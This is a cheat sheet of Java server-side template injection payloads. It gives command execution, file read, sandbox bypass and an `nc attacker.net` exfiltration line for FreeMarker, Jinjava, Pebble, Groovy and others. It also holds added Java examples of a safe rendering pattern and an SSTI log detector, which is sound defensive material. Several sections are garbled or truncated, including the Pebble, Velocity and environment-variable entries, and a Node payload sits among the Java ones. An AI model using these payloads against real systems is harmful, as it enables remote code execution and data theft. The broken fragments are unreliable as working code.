Server Side Template Injection - Java
Templating Libraries
| Template Name | Payload Format |
| --- | --- |
| Codepen | `#{}` |
| Freemarker | `${3*3}`, `#{3*3}`, `[=3*3]` |
| Groovy | `${9*9}` |
| Jinjava | `{{ }}` |
| Pebble | `{{ }}` |
| Spring | `*{7*7}` |
| Thymeleaf | `[[ ]]` |
| Velocity | `#set($X="") $X` |
Java - Basic injection
Multiple variable expressions can be used: if `${...}` doesn't work, try `#{...}`.
Java - Retrieve the system’s environment variables
Java - Retrieve /etc/passwd
```
${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
```
Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data.
You can try your payloads at https://try.freemarker.apache.org
Freemarker - Basic injection
The template can be:
- Default: `${3*3}`
- Legacy: `#{3*3}`
- Alternative: `[=3*3]`, since FreeMarker 2.3.4
Freemarker - Read File
```
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('path_to_the_file').toURL().openStream().readAllBytes()?join(" ")}
```
Convert the returned bytes to ASCII
Freemarker - Code execution
```
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
```
Freemarker - Sandbox bypass
⚠️ only works on Freemarker versions below 2.3.30
```
<#assign classloader=article.class.protectionDomain.classLoader>
<#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
<#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
<#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
```
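As an added example (not code from this page or from the FreeMarker project), the Java below contrasts the pattern that makes the FreeMarker payloads above work, compiling user input as the template source, with rendering the same input as a data-model value on a `Configuration` where the `?new` built-in resolves nothing; the class, method and template names are my own.

```java
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.DefaultObjectWrapperBuilder;
import freemarker.template.Template;
import freemarker.template.TemplateException;
import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.HashMap;
import java.util.Map;

public class FreemarkerSstiDemo {
    private static final Configuration CFG = buildConfiguration();

    static Configuration buildConfiguration() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
        // "freemarker.template.utility.Execute"?new() now throws instead of instantiating.
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        // Wrap beans without exposing public fields; 2.3.30+ additionally offers a
        // whitelist MemberAccessPolicy on this builder (setMemberAccessPolicy).
        DefaultObjectWrapperBuilder owb = new DefaultObjectWrapperBuilder(Configuration.VERSION_2_3_31);
        owb.setExposeFields(false);
        cfg.setObjectWrapper(owb.build());
        cfg.setAPIBuiltinEnabled(false); // keep ?api off
        return cfg;
    }

    // VULNERABLE pattern: user input is parsed as template source, so ${...} inside it is evaluated.
    static String renderUserInputAsTemplate(String userInput) throws IOException, TemplateException {
        Template t = new Template("inline", new StringReader(userInput), CFG);
        StringWriter out = new StringWriter();
        t.process(new HashMap<String, Object>(), out);
        return out.toString();
    }

    // SAFE pattern: the template is fixed; user input is only a value and is never parsed.
    static String renderUserInputAsData(String userInput) throws IOException, TemplateException {
        Template t = new Template("fixed", new StringReader("Hello ${name}!"), CFG);
        Map<String, Object> model = new HashMap<>();
        model.put("name", userInput);
        StringWriter out = new StringWriter();
        t.process(model, out);
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        String probe = "${3*3}";                                  // the basic-injection probe
        System.out.println(renderUserInputAsData(probe));         // Hello ${3*3}!  (literal)
        System.out.println(renderUserInputAsTemplate(probe));     // 9              (evaluated: SSTI)
    }
}
```

The hardened configuration only narrows what a template can reach; the rendering pattern in `renderUserInputAsData` is the actual fix.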
```
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')
```
```
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
```
Java-based template engine based on django template syntax, adapted to render jinja templates (at least the subset of jinja in use in HubSpot content).
Jinjava - Basic injection
`{{'a'.toUpperCase()}}` would result in `'A'`
`{{ request }}` would return a request object like `com.[...].context.TemplateContextRequest@23548206`
Jinjava is an open source project developed by Hubspot, available at https://github.com/HubSpot/jinjava/
Jinjava - Command execution
Fixed by https://github.com/HubSpot/jinjava/pull/230
```
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
```
Pebble is a Java templating engine inspired by Twig and similar to the Python Jinja Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization.
Pebble - Basic injection
```
{{ someString.toUpperCase() }}
```
Pebble - Code execution
Old version of Pebble (< 3.0.9):
```
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
```
New version of Pebble:
```
{% set cmd = 'id' %}
{% set bytes = (1).TYPE
.readAllBytes() %}
{{ (1).TYPE
.newInstance(([bytes]).toArray()) }}
```
Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.
```
#foreach($i in [1..$out.available()])
```
Groovy - Basic injection
Refer to https://groovy-lang.org/syntax.html, but `${9*9}` is the basic injection.
Groovy - Read and create File
```
${String x = new File('c:/windows/notepad.exe').text}
${String x = new File('/path/to/file').getText('UTF-8')}
${new File("C:\\Temp\\FileName.txt").createNewFile()}
```
Groovy - HTTP request:
```
${new URL("http://www.google.com").getText()}
```
Groovy - Command Execution
```
${this.evaluate("9*9")}
${new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()}
```
In the first payload, `this` is a Groovy `Script` class.
Groovy - Sandbox Bypass
```
${ @ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
def x }
```
```
${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
```
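For the detection side, the Java below is an added example (not from this page) that flags request lines carrying either an arithmetic probe in one of the delimiter styles from the table at the top, or one of the class and method names that recur in the code-execution payloads above (FreeMarker `Execute`, `ScriptEngineManager`, `ProcessBuilder`, `GroovyClassLoader`, `ASTTest`); the sample log lines are constructed and assumed already URL-decoded.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class SstiProbeDetector {
    // Opening delimiter from the table (${, #{, {{, [=, *{, [[) followed by "number op number"
    private static final Pattern PROBE = Pattern.compile(
        "(\\$\\{|#\\{|\\{\\{|\\[=|\\*\\{|\\[\\[)\\s*[^}\\]]*?\\d+\\s*[*+\\-/]\\s*\\d+");
    // Identifiers that appear in the execution and sandbox-bypass payloads on this page
    private static final Pattern GADGET = Pattern.compile(
        "freemarker\\.template\\.utility\\.Execute|ScriptEngineManager|getRuntime\\(\\)|ProcessBuilder"
        + "|GroovyClassLoader|ASTTest|protectionDomain|getClass\\(\\)\\.forName|\\?new\\(\\)",
        Pattern.CASE_INSENSITIVE);

    /** Returns the reasons a request line looks like an SSTI attempt; an empty list means nothing matched. */
    static List<String> inspect(String requestLine) {
        List<String> findings = new ArrayList<>();
        Matcher m = PROBE.matcher(requestLine);
        if (m.find()) {
            findings.add("template arithmetic probe: " + m.group());
        }
        m = GADGET.matcher(requestLine);
        while (m.find()) {
            findings.add("execution gadget: " + m.group());
        }
        return findings;
    }

    public static void main(String[] args) {
        // Constructed sample access-log lines (already URL-decoded), for illustration only
        String[] lines = {
            "GET /greet?name=Alice HTTP/1.1 200",
            "GET /greet?name=${7*7} HTTP/1.1 200",
            "GET /greet?name=<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")} HTTP/1.1 500",
            "POST /render body=name={{'a'.getClass().forName('javax.script.ScriptEngineManager')}} 200",
        };
        for (String line : lines) {
            List<String> f = inspect(line);
            String verdict = f.isEmpty() ? "clean  " : "SUSPECT";
            System.out.println(verdict + " | " + line + (f.isEmpty() ? "" : " | " + f));
        }
    }
}
```

A match is a triage signal for review, not proof of exploitation; the `PROBE` pattern will also fire on legitimate template snippets submitted by trusted users, so tune it per application.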
- Server Side Template Injection – on the example of Pebble - Michał Bentkowski - September 17, 2019
- Server-Side Template Injection: RCE For The Modern Web App - James Kettle (@albinowax) - December 10, 2015
- Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle (@albinowax) - August 8, 2015
- Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle (@albinowax) - December 28, 2015
- VelocityServlet Expression Language injection - MagicBlue - November 15, 2017